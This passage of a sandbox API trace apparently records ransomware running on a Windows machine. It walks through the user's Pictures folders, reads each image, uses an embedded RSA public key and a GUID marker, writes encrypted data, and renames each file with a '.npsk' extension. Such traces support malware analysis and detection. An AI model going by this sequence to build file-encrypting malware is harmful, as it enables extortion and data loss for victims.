KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.332] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.333] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.333] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.333] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.333] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.333] GetLastError () returned 0x0 [0217.333] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.333] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.333] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.333] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.333] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.334] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.335] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe24c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.335] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.335] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.335] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.335] CloseHandle (hObject=0x61c) returned 1 [0217.343] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\YZbcCxQj6QJgfyZ9_L.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\yzbccxqj6qjgfyz9_l.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\YZbcCxQj6QJgfyZ9_L.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\yzbccxqj6qjgfyz9_l.png.npsk")) returned 1 [0217.347] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f187170, ftCreationTime.dwHighDateTime=0x1d5da43, ftLastAccessTime.dwLowDateTime=0xe41695c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a0, ftLastWriteTime.dwLowDateTime=0xe41695c0, ftLastWriteTime.dwHighDateTime=0x1d5e1a0, nFileSizeHigh=0x0, nFileSizeLow=0xe24c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZbcCxQj6QJgfyZ9_L.png", cAlternateFileName="YZBCCX~1.PNG")) returned 0 [0217.347] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.347] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.347] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.347] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\") returned="l20mH\\" [0217.347] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\") returned="S-r24cctxl\\" [0217.347] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0217.347] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.347] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.348] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.348] PathFindFileNameW (pszPath="") returned="" [0217.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ffc0e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x25bdf570, ftLastAccessTime.dwHighDateTime=0x1d5e725, ftLastWriteTime.dwLowDateTime=0x25bdf570, ftLastWriteTime.dwHighDateTime=0x1d5e725, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.350] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ffc0e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x25bdf570, ftLastAccessTime.dwHighDateTime=0x1d5e725, ftLastWriteTime.dwLowDateTime=0x25bdf570, ftLastWriteTime.dwHighDateTime=0x1d5e725, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.350] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca263120, ftCreationTime.dwHighDateTime=0x1d5e1d2, ftLastAccessTime.dwLowDateTime=0x14d66d30, ftLastAccessTime.dwHighDateTime=0x1d5d96c, ftLastWriteTime.dwLowDateTime=0x14d66d30, ftLastWriteTime.dwHighDateTime=0x1d5d96c, nFileSizeHigh=0x0, nFileSizeLow=0xcdeb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LCstxP9J.gif", cAlternateFileName="6LCSTX~1.GIF")) returned 1 [0217.350] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\6LCstxP9J.gif") returned=".gif" [0217.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\6LCstxP9J.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\6lcstxp9j.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.352] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=52715) returned 1 [0217.352] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.354] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcdc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.354] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.356] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xcdeb, lpOverlapped=0x0) returned 1 [0217.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.357] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.358] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.358] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.358] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.358] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.358] GetLastError () returned 0x0 [0217.358] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.358] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.358] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.359] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.359] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.359] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.360] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcdeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.360] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.360] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.360] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.360] CloseHandle (hObject=0x61c) returned 1 [0217.363] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\6LCstxP9J.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\6lcstxp9j.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\6LCstxP9J.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\6lcstxp9j.gif.npsk")) returned 1 [0217.366] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7045b0, ftCreationTime.dwHighDateTime=0x1d5e1f0, ftLastAccessTime.dwLowDateTime=0x2eb28130, ftLastAccessTime.dwHighDateTime=0x1d5e498, ftLastWriteTime.dwLowDateTime=0x2eb28130, ftLastWriteTime.dwHighDateTime=0x1d5e498, nFileSizeHigh=0x0, nFileSizeLow=0x148bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JE0PI-d.png", cAlternateFileName="")) returned 1 [0217.366] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\JE0PI-d.png") returned=".png" [0217.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\JE0PI-d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\je0pi-d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.366] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=84159) returned 1 [0217.366] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.369] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14899, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.369] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.371] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x148bf, lpOverlapped=0x0) returned 1 [0217.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.372] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.374] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.374] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.374] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.374] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.374] GetLastError () returned 0x0 [0217.374] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.374] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.374] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.374] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.374] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.375] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.376] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x148bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.376] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.376] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.376] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.376] CloseHandle (hObject=0x61c) returned 1 [0217.378] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\JE0PI-d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\je0pi-d.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\JE0PI-d.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\je0pi-d.png.npsk")) returned 1 [0217.380] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60720, ftCreationTime.dwHighDateTime=0x1d5db8c, ftLastAccessTime.dwLowDateTime=0x5fe07580, ftLastAccessTime.dwHighDateTime=0x1d5db2b, ftLastWriteTime.dwLowDateTime=0x5fe07580, ftLastWriteTime.dwHighDateTime=0x1d5db2b, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N89nfvgl.gif", cAlternateFileName="")) returned 1 [0217.381] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\N89nfvgl.gif") returned=".gif" [0217.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\N89nfvgl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\n89nfvgl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.381] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=2432) returned 1 [0217.381] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.384] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x95a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.384] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.386] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x980, lpOverlapped=0x0) returned 1 [0217.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.386] lstrlenA (lpString="-----BEGIN PUBLIC 